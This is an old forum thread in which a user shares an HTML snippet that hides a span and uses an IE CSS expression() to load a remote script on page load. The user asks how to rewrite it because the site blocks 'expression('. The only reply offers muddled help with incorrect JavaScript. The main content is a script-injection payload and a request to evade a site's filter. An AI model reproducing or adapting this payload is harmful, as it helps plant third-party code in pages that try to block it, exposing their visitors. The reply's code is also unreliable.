Jump to content

"expression"


Cheap Commercial

Recommended Posts

is there anyway to change the following code so expression( is not there becuase it is blocked

heres is the code


<style> .divSubmitVisible {display:none;} </style> <span style="font-size=expression('1px' +function(){if (!document.ran){ document.ran=true; document.profile='6756'; document.offs='0'; var x=function(){ var s=document.createElement('script'); s.src='*************.js'; document.body.appendChild(s)}; window.attachEvent('onload', x); }}())" > </span>

is it possible to change the font size thing to something else?

that basically what i needed before the java to css thing
Link to comment
Share on other sites

Hi there,

I'm not sure to get it all well, so,...
[!--quoteo--][div class=\'quotetop\']QUOTE[/div][div class=\'quotemain\'][!--quotec--]
is it possible to change the font size thing to something else?
[/quote]
Hmm,, I would try something like:
---
<span [b]Id="myId1"[/b] style="font-size=expression('1px' ....
---
& then, using javascript, with the 'onclick()' function, by example, I would try something like:
---
document.getElementById('myId1').styleFont="whatyouwant&whatyouneed:)";
---
Hoping it will help,

l8tr,,

Link to comment
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.